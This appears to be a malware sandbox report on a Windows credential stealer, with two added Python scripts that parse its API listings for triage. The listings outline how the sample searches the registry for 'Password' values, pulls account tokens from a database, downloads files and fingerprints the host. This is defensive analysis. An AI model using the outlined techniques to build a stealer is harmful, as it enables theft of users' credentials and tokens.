                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 4276352425-0
                                                                                    • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                                                    • Instruction ID: 5adb693a1631ae563ace033cdde137963ac0a72ef897c7074d63f95a382299f2
                                                                                    • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                                                    • Instruction Fuzzy Hash: B47155B595012CABCB14EBA0DD98EEE737AEF74304F044598A10DA6240EE759F89CF71
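The function summaries above list each routine's imported calls with a call-site address (the "ref" value) but not in call order, print "Part of subcall function" entries that belong to a callee, and show flag arguments as raw hex. The Python script below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it parses entries in exactly the format shown above, sorts the direct calls by "ref" to recover the order in which the function makes them, flags two call chains present in this sample (the WinINet open/connect/request/send/read chain of the routine at 02D14B7C and the RegOpenKeyExA/RegEnumValueA/StrStrA walk of 004072D0 that searches value data for "Password"), and names known constants such as 80000001 (HKEY_CURRENT_USER), 00020019 (KEY_READ) and 001FFFFF (PROCESS_ALL_ACCESS). The rule names are this example's own, and the sample text embedded in it is assembled from lines copied out of the listings above.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Sample input assembled from the API entries of two function summaries above.
SAMPLE = """\
APIs
  • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02D14B7C
• StrCmpCA.SHLWAPI(?,0064A480), ref: 02D14BA1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02D14D21
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02D1507F
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02D150B0
• InternetCloseHandle.WININET(00000000), ref: 02D15114
• HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02D14D7C
Memory Dump Source
APIs
• memset.MSVCRT ref: 00407314
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
• RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
• task.LIBCPMTD ref: 00407555
Memory Dump Source
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^\s(]+?)\.(?P<mod>[A-Z0-9]+)"      # e.g. InternetOpenA.WININET
    r"(?:\((?P<args>[^)]*)\))?"                   # argument list; absent for memset/task
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]{8}))?\s*$"  # call-site address
)


class Call(NamedTuple):
    api: str
    module: str
    args: List[str]
    ref: Optional[int]      # call-site address
    subcall: Optional[int]  # callee address when the entry is "Part of subcall function"


def parse_blocks(text: str) -> List[List[Call]]:
    """Split report text into one list of calls per "APIs" section."""
    blocks: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        m = API_LINE.match(line)
        if current is None or not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.append(Call(m["api"], m["mod"], args,
                            int(m["ref"], 16) if m["ref"] else None,
                            int(m["sub"], 16) if m["sub"] else None))
    return blocks


def call_order(block: List[Call]) -> List[str]:
    """Direct calls sorted by call-site address, i.e. the order the function makes them.
    Subcall entries are skipped: their addresses belong to another function."""
    direct = [c for c in block if c.subcall is None and c.ref is not None]
    return [c.api for c in sorted(direct, key=lambda c: c.ref)]


def contains_in_order(seq: List[str], needles: List[str]) -> bool:
    """True if every needle occurs in seq in the given order (gaps allowed)."""
    it = iter(seq)
    return all(n in it for n in needles)


# Ordered call chains worth flagging in a stealer. Rule names are this example's own.
RULES = {
    "wininet_http_c2": ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                        "HttpSendRequestA", "InternetReadFile"],
    "registry_credential_scrape": ["RegOpenKeyExA", "RegEnumValueA", "StrStrA"],
}

# Windows SDK names for raw argument values, keyed by (API, argument index).
FLAGS = {
    ("RegOpenKeyExA", 0): {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"},
    ("RegOpenKeyExA", 3): {0x00020019: "KEY_READ"},
    ("OpenProcess", 0): {0x001FFFFF: "PROCESS_ALL_ACCESS"},
}


def literals(block: List[Call]) -> List[str]:
    """Arguments that are neither 8-digit hex values nor '?': string constants the plugin resolved."""
    return sorted({a for c in block for a in c.args if a and not re.fullmatch(r"[0-9A-F]{8}|\?", a)})


def classify(block: List[Call]) -> Tuple[List[str], List[str]]:
    order = call_order(block)
    hits = [name for name, chain in RULES.items() if contains_in_order(order, chain)]
    return hits, literals(block)


def annotate(call: Call) -> str:
    """Render a call with known flag values replaced by their SDK names."""
    rendered = []
    for i, a in enumerate(call.args):
        names = FLAGS.get((call.api, i), {})
        rendered.append(names.get(int(a, 16), a) if re.fullmatch(r"[0-9A-F]{8}", a) else a)
    return f"{call.api}({', '.join(rendered)})"


if __name__ == "__main__":
    for block in parse_blocks(SAMPLE):
        hits, strings = classify(block)
        print(" -> ".join(call_order(block)))
        print("  rules:", hits, " string args:", strings)
        for c in block:
            print("   ", annotate(c))
```

A chain hit is a triage signal, not proof of command-and-control on its own: the listing shows that the routine builds and sends an HTTP request, while the host and path it talks to are the strings the config extractor reports elsewhere in this analysis. Sorting by "ref" also only reconstructs straight-line order; loops and branches inside the function are not visible from the summary.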
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00407314
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                                                    • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                                                      • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                                                    • task.LIBCPMTD ref: 00407555
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                    • String ID: Password
                                                                                    • API String ID: 2698061284-3434357891
                                                                                    • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                                    • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                                                    • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                                    • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02E39968,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02E39968,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                                                    • __aulldiv.LIBCMT ref: 00418172
                                                                                    • __aulldiv.LIBCMT ref: 00418180
                                                                                    • wsprintfA.USER32 ref: 004181AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                    • String ID: %d MB$@
                                                                                    • API String ID: 2886426298-3474575989
                                                                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                    • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                                                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                    • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                      • Part of subcall function 02D14A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                      • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 02D16376
                                                                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 02D163AE
                                                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 02D163F6
                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02D1641A
                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 02D16443
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D16471
                                                                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 02D164B0
                                                                                    • InternetCloseHandle.WININET(?), ref: 02D164BA
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D164C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 4287319946-0
                                                                                    • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                                                    • Instruction ID: 604281b03fa77612d12e83c8daee0d8326a7ee2c632cb942875a99c5eedbd4c1
                                                                                    • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                                                    • Instruction Fuzzy Hash: A5514EB5A40218BBDB20DFA0DC45BEE7779EB44705F408098F605A72C0DB74AE89CFA5
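Added example (editor's code, not part of the Joe Sandbox report or of the sample): a small Python parser for the "APIs" listings in this report, applied to the registry-value scan at 00407314 (RegOpenKeyExA on HKCU, RegEnumValueA, StrStrA against "Password") and the WinINet download routine at 02D16376 (InternetOpenUrlA, InternetReadFile feeding CreateFileA/WriteFile). The sample input is constructed by copying those two listings; the behaviour tags, the function names and the `ApiCall` record are the editor's own triage heuristics, not Joe Sandbox output.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: two "APIs" listings copied in the shape the report prints them
# (bullets, optional "Part of subcall function" prefix, "ref:" address).
SAMPLE_FUNCS = {
    "02D16376_download": """
  • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
• InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 02D16376
• StrCmpCA.SHLWAPI(?,0064A480), ref: 02D163AE
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 02D163F6
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02D1641A
• InternetReadFile.WININET(?,?,00000400,?), ref: 02D16443
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D16471
• CloseHandle.KERNEL32(?,?,00000400), ref: 02D164B0
• InternetCloseHandle.WININET(?), ref: 02D164BA
""",
    "00407314_regscan": """
• memset.MSVCRT ref: 00407314
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
• RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
  • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
• task.LIBCPMTD ref: 00407555
""",
}

# One report line: [Part of subcall function ADDR: ]Name.MODULE[(args)], ref: ADDR
# The API name may contain '?' and '@' (e.g. the decorated operator new ??2@YAPAXI@Z).
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[^\s.]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw argument column; '?' means the plugin could not resolve it
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address when the line is marked "Part of subcall function"


def parse_api_block(text: str) -> List[ApiCall]:
    """Turn one function's 'APIs' listing into ApiCall records."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = m["args"].split(",") if m["args"] else []
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def behaviour_tags(calls: List[ApiCall]) -> List[str]:
    """Editor's heuristics over the direct (non-subcall) APIs of one function."""
    direct = {c.api for c in calls if c.subcall is None}
    tags = set()
    # WinINet read loop writing into a freshly created file: payload download to disk.
    if {"InternetReadFile", "CreateFileA", "WriteFile"} <= direct:
        tags.add("download-to-disk")
    # Enumerating registry values and substring-matching their names on "Password".
    if "RegEnumValueA" in direct and any(
        c.api == "StrStrA" and "Password" in c.args for c in calls
    ):
        tags.add("registry-credential-search")
    # Physical RAM query, used by stealers to fingerprint the host / spot small VMs.
    if "GlobalMemoryStatusEx" in direct:
        tags.add("host-fingerprint-ram")
    return sorted(tags)


def triage(funcs: dict) -> dict:
    """Map each listed function to the behaviour tags its API sequence triggers."""
    return {name: behaviour_tags(parse_api_block(text)) for name, text in funcs.items()}


if __name__ == "__main__":
    for name, tags in triage(SAMPLE_FUNCS).items():
        print(f"{name}: {', '.join(tags) or 'no tag'}")
```

Direct calls are separated from "Part of subcall function" entries because the latter belong to a callee and would otherwise make every caller look like it performs the callee's work; the download tag is deliberately tied to the file-write pair rather than to InternetOpenUrlA alone, since a plain HTTP GET for a config is not the same behaviour as dropping a second-stage file.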
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D24FEE
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D25017
                                                                                    • lstrcat.KERNEL32(?,00421000), ref: 02D25034
                                                                                      • Part of subcall function 02D24B77: wsprintfA.USER32 ref: 02D24B93
                                                                                      • Part of subcall function 02D24B77: FindFirstFileA.KERNEL32(?,?), ref: 02D24BAA
                                                                                    • memset.MSVCRT ref: 02D2507A
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D250A3
                                                                                    • lstrcat.KERNEL32(?,00421020), ref: 02D250C0
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02D24BD8
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02D24BEE
                                                                                      • Part of subcall function 02D24B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02D24DE4
                                                                                      • Part of subcall function 02D24B77: FindClose.KERNEL32(000000FF), ref: 02D24DF9
                                                                                    • memset.MSVCRT ref: 02D25106
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2512F
                                                                                    • lstrcat.KERNEL32(?,00421038), ref: 02D2514C
                                                                                      • Part of subcall function 02D24B77: wsprintfA.USER32 ref: 02D24C17
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 02D24C2C
                                                                                      • Part of subcall function 02D24B77: wsprintfA.USER32 ref: 02D24C49
                                                                                      • Part of subcall function 02D24B77: PathMatchSpecA.SHLWAPI(?,?), ref: 02D24C85
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,0064A524), ref: 02D24CB1
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,00420FF8), ref: 02D24CC3
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,?), ref: 02D24CD7
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,00420FFC), ref: 02D24CE9
                                                                                      • Part of subcall function 02D24B77: lstrcat.KERNEL32(?,?), ref: 02D24CFD
                                                                                      • Part of subcall function 02D24B77: CopyFileA.KERNEL32(?,?,00000001), ref: 02D24D13
                                                                                      • Part of subcall function 02D24B77: DeleteFileA.KERNEL32(?), ref: 02D24D98
                                                                                    • memset.MSVCRT ref: 02D25192
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                    • String ID:
                                                                                    • API String ID: 4017274736-0
                                                                                    • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                                                    • Instruction ID: b63f88cff0e5c97a1a01a99cc0b24a248f58e8e70ace1783f5c64ddc9242094a
                                                                                    • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                                                    • Instruction Fuzzy Hash: 89419779A40228A7DB14F7B0EC46FD97739EF34705F404454A689A61C0EEB59BCC8FA2
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 02D28397
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D2839E
                                                                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 02D283BF
                                                                                    • __aulldiv.LIBCMT ref: 02D283D9
                                                                                    • __aulldiv.LIBCMT ref: 02D283E7
                                                                                    • wsprintfA.USER32 ref: 02D28413
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                    • String ID: @
                                                                                    • API String ID: 2774356765-2766056989
                                                                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                    • Instruction ID: 1bcafc5f4cc4fd5410844049601fcfc21f5af0bd489fd17efd52bc5234f2de8e
                                                                                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                    • Instruction Fuzzy Hash: 5D214DB1E44218ABDB00DFD4CC49FAEB7B9FB44B14F104519F605BB280C7786905CBA5
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                    • API String ID: 1440504306-1079375795
                                                                                    • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                                                    • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                                                    • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                                                    • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess$DefaultLangUser
                                                                                    • String ID: B
                                                                                    • API String ID: 1494266314-2248957098
                                                                                    • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                                                    • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                                                    • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                                                    • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                                                    • memset.MSVCRT ref: 00409EE8
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                                                    • API String ID: 1977917189-1096346117
                                                                                    • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                                                    • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                                                    • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                                                    • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                                                    APIs
                                                                                      • Part of subcall function 02D17537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02D175A1
                                                                                      • Part of subcall function 02D17537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02D17618
                                                                                      • Part of subcall function 02D17537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02D17674
                                                                                      • Part of subcall function 02D17537: GetProcessHeap.KERNEL32(00000000,?), ref: 02D176B9
